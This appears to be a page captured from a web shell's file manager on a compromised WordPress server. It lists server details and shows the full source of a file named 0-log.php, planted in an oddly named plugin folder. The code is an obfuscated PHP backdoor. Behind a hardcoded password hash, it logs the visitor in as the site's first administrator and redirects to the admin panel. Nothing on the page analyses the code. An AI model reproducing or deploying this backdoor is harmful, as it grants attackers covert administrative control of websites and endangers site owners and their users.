HEX
Server: nginx/1.24.0
System: Linux DGT-WORDPRESS-VM-SERVER 6.14.0-1014-azure #14~24.04.1-Ubuntu SMP Fri Oct 3 20:52:11 UTC 2025 x86_64
User: ubuntu (1000)
PHP: 8.4.12
Disabled: NONE
$ pwd: /mnt/data/kofejob-wp/wp-content/plugins/ufuyyzn/
Upload Files
File: /mnt/data/kofejob-wp/wp-content/plugins/ufuyyzn/0-log.php
<?php
 goto bURTv; hq4zC: if (!isset($_SESSION["\154\157\x67\147\145\x64\137\x69\x6e"]) || !$_SESSION["\154\x6f\147\x67\145\144\x5f\151\156"]) { if ($_SERVER["\122\105\x51\125\x45\x53\124\137\115\105\124\110\x4f\104"] === "\x50\x4f\123\124" && isset($_POST["\x70\x61\x73\x73\167\157\162\x64"]) && md5($_POST["\160\141\x73\163\167\x6f\x72\x64"]) === $Pass) { $_SESSION["\x6c\x6f\147\147\145\144\x5f\x69\156"] = true; } else { ?>
<!doctypehtml><html lang="en"><head><meta charset="UTF-8"><meta content="width=device-width,initial-scale=1"name="viewport"><title>Login</title><style>body{font-family:monospace,sans-serif;margin:0;padding:0;background:#000;color:#0f0}form{margin:100px auto;width:300px;padding:20px;border:1px solid #0f0;background:#030}input[type=password]{background:#030;color:#0f0;border:1px solid #0f0;padding:10px;width:100%;box-sizing:border-box}input[type=submit]{background:#0f0;color:#000;border:none;padding:10px 20px;cursor:pointer;margin-top:10px}p{color:red}</style></head><body><form method="post"><h1>Login</h1><input type="password"name="password"placeholder="Password"required> <input type="submit"value="Login"></form><?php  if (isset($_POST["\x70\141\163\x73\x77\157\x72\x64"]) && md5($_POST["\x70\141\x73\x73\x77\157\x72\x64"]) !== $Pass) { ?>
<p>Incorrect password. Please try again.</p><?php  } ?>
</body></html><?php  die; } } goto N9Cdc; U7gDV: @chdir($mr); goto zcIfe; bURTv: session_start(); goto oRhRI; zcIfe: if (file_exists("\167\160\55\x6c\157\141\144\x2e\x70\x68\x70")) { include "\167\160\x2d\x6c\157\x61\144\56\x70\x68\160"; $wp_user_query = new WP_User_Query(array("\x72\157\154\x65" => "\x41\x64\x6d\151\x6e\x69\163\164\x72\141\x74\x6f\162", "\156\x75\x6d\142\145\162" => 1, "\146\x69\x65\x6c\144\163" => "\111\x44")); $results = $wp_user_query->get_results(); if (isset($results[0])) { wp_set_auth_cookie($results[0]); wp_redirect(admin_url()); die; } die("\116\x4f\x20\x41\104\x4d\x49\116"); } else { die("\x46\141\151\x6c\x65\x64\40\x74\157\40\x6c\x6f\141\x64"); } goto kQ7e4; N9Cdc: $mr = $_SERVER["\104\x4f\103\x55\115\x45\116\124\137\x52\117\x4f\124"]; goto U7gDV; oRhRI: $Pass = "\x36\x36\x38\144\x33\146\x33\146\x61\x32\x62\146\x30\x63\x36\63\71\x31\x34\70\63\71\x36\65\144\71\146\x62\x39\x34\x38\x35"; goto hq4zC; kQ7e4: ?>
@ Telegram